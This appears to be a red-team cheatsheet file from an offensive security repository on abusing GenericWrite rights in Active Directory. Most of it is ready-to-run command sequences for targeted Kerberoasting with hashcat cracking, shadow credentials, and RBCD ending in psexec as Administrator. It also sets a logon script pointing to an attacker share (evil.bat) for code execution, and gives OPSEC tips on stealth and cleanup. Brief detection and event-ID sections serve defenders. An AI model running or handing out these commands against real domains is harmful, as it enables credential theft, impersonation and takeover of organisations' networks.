daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-20-genericwrite-abuse.md (7728B)


      1 ---
      2 title: "Attack #20 β€” GenericWrite Abuse"
      3 description: "GenericWrite allows an attacker to write to any non-protected attribute on a target AD object. While it doesn't grant full control like GenericAll, it…"
      4 category: active-directory
      5 subcategory: "ACL Abuse"
      6 tags: ["active-directory", "kerberos", "hashing"]
      7 tools: ["Rubeus", "Certipy", "Hashcat", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/🟑 Attack #20 β€” GenericWrite Abuse.md"
     11 ---
     12 # 🟑 Attack #20 β€” GenericWrite Abuse
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 GenericWrite allows an attacker to **write to any non-protected attribute** on a target AD object. While it doesn't grant full control like GenericAll, it enables several powerful exploitation paths: **Targeted Kerberoasting** (set an SPN on a user, roast their hash), **Shadow Credentials** (write to `msDS-KeyCredentialLink` for passwordless auth), **logon script modification**, and **RBCD configuration** (write to `msDS-AllowedToActOnBehalfOfOtherIdentity` on computers).
     19 
     20 ### Exploitation Methods by Target Type
     21 
     22 | Target Type | Method | What You Write | Result |
     23 |---|---|---|---|
     24 | **User** | Targeted Kerberoasting | `servicePrincipalName` | Crack their hash offline |
     25 | **User** | Shadow Credentials | `msDS-KeyCredentialLink` | Auth as target via PKINIT |
     26 | **User** | Logon Script | `scriptPath` | Code execution on next logon |
     27 | **Computer** | RBCD | `msDS-AllowedToActOnBehalfOfOtherIdentity` | Impersonate any user to that host |
     28 | **Computer** | Shadow Credentials | `msDS-KeyCredentialLink` | Auth as that computer |
     29 | **Group** | ❌ Cannot add members | N/A | GenericWrite β‰  WriteMembers for groups |
     30 
     31 ***
     32 
     33 ## βš™οΈ Prerequisites
     34 
     35 | Requirement | Detail |
     36 |---|---|
     37 | **GenericWrite ACE on target** | Must exist in the target object's DACL |
     38 | **Domain user account** | Any authenticated domain user |
     39 
     40 ***
     41 
     42 ## πŸ› οΈ Tools
     43 
     44 | Tool | Platform | Notes |
     45 |---|---|---|
     46 | **PowerView** | Windows | `Set-DomainObject` for attribute manipulation |
     47 | **Whisker** | Windows | Shadow Credentials exploitation |
     48 | **pyWhisker** | Linux | Python Shadow Credentials tool |
     49 | **Certipy** | Linux | `shadow auto` for automated Shadow Creds |
     50 | **Rubeus** | Windows | Kerberoasting, PKINIT auth |
     51 | **bloodyAD** | Linux | All-in-one AD exploitation |
     52 
     53 ***
     54 
     55 ## πŸ’» Full Commands
     56 
     57 ### πŸ”΄ Method 1 β€” Targeted Kerberoasting
     58 
     59 ```powershell
     60 # ── Set SPN on target user ────────────────────────────────────────────────────
     61 Set-DomainObject -Identity targetadmin -Set @{serviceprincipalname='fake/kerberoast'}
     62 
     63 # ── Roast the hash ────────────────────────────────────────────────────────────
     64 .\Rubeus.exe kerberoast /user:targetadmin /outfile:roast.txt
     65 
     66 # ── Crack offline ─────────────────────────────────────────────────────────────
     67 hashcat -m 13100 roast.txt rockyou.txt --force
     68 
     69 # ── Clean up β€” remove the SPN ────────────────────────────────────────────────
     70 Set-DomainObject -Identity targetadmin -Clear serviceprincipalname
     71 ```
     72 
     73 ```bash
     74 # ── Linux β€” targeted kerberoasting ────────────────────────────────────────────
     75 # Set SPN via bloodyAD
     76 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     77   set object targetadmin servicePrincipalName -v 'fake/kerberoast'
     78 
     79 # Roast
     80 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
     81   -request-user targetadmin -outputfile roast.txt
     82 
     83 # Clean up
     84 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     85   set object targetadmin servicePrincipalName
     86 ```
     87 
     88 ### πŸ”΄ Method 2 β€” Shadow Credentials
     89 
     90 ```powershell
     91 # ── Whisker β€” add shadow credential to target user ───────────────────────────
     92 .\Whisker.exe add /target:targetadmin /domain:corp.local /dc:DC01.corp.local
     93 # Outputs a Rubeus command to request TGT with the new key credential
     94 
     95 # Run the outputted Rubeus command to get a TGT as targetadmin
     96 ```
     97 
     98 ```bash
     99 # ── pyWhisker ─────────────────────────────────────────────────────────────────
    100 python3 pywhisker.py -d corp.local -u low_user -p 'Password1' \
    101   --target targetadmin --action add --dc-ip 10.10.10.10
    102 
    103 # ── Certipy shadow auto (easiest) ────────────────────────────────────────────
    104 certipy shadow auto -u low_user@corp.local -p 'Password1' \
    105   -account targetadmin -dc-ip 10.10.10.10 -dc-host dc01.corp.local
    106 # Outputs: NT hash and TGT for targetadmin
    107 ```
    108 
    109 ### πŸ”΄ Method 3 β€” RBCD (on Computer objects)
    110 
    111 ```bash
    112 # ── Configure RBCD on target computer ─────────────────────────────────────────
    113 addcomputer.py -computer-name 'FAKE$' -computer-pass 'Pass123!' \
    114   -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    115 
    116 rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' \
    117   -action write -dc-ip 10.10.10.10 corp.local/low_user:'Password1'
    118 
    119 getST.py -spn cifs/TARGET.corp.local -impersonate Administrator \
    120   -dc-ip 10.10.10.10 corp.local/'FAKE$':'Pass123!'
    121 
    122 export KRB5CCNAME=Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache
    123 psexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local
    124 ```
    125 
    126 ### πŸ”΄ Method 4 β€” Logon Script Modification
    127 
    128 ```powershell
    129 # ── Set malicious logon script path ───────────────────────────────────────────
    130 Set-DomainObject -Identity targetadmin -Set @{scriptpath='\\ATTACKER\share\evil.bat'}
    131 # Next time targetadmin logs in, evil.bat executes in their context
    132 ```
    133 
    134 ***
    135 
    136 ## 🎯 OPSEC Tips
    137 
    138 - **Shadow Credentials is the stealthiest method** β€” original password unchanged, persistent access
    139 - **Targeted Kerberoasting requires cleanup** β€” always remove the SPN after getting the hash
    140 - **GenericWrite on groups does NOT let you add members** β€” you need WriteMembers or GenericAll for that
    141 - **Monitor Event 5136** for all methods β€” it catches attribute modifications
    142 
    143 ***
    144 
    145 ## πŸ›‘οΈ Detection β€” Event IDs
    146 
    147 | Event ID | Source | What to Look For |
    148 |---|---|---|
    149 | **5136** | Security Log (DC) | Attribute modification: `servicePrincipalName`, `msDS-KeyCredentialLink`, `scriptPath`, `msDS-AllowedToActOnBehalfOfOtherIdentity` |
    150 | **4738** | Security Log (DC) | User account changed β€” SPN modification |
    151 | **4741** | Security Log (DC) | Computer account created (RBCD path) |
    152 
    153 ***
    154 
    155 ## πŸ”— Attack Chain Context
    156 
    157 ```
    158 [GenericWrite] ──→ Multiple Escalation Paths
    159          β”‚
    160          β”œβ”€β”€β†’ 🎫 Targeted Kerberoasting β†’ crack password β†’ impersonate user
    161          β”œβ”€β”€β†’ πŸ”‘ Shadow Credentials β†’ passwordless auth as target
    162          β”œβ”€β”€β†’ πŸ’» RBCD on computers β†’ impersonate DA to that host
    163          β”œβ”€β”€β†’ πŸ“‹ Logon script β†’ code execution on target's next logon
    164          └──→ πŸ’€ Defeated by: ACL auditing, monitor 5136, least privilege
    165 ```
    166 
    167 ***
    168 
    169 > βœ… **Attack #20 β€” GenericWrite Abuse complete.**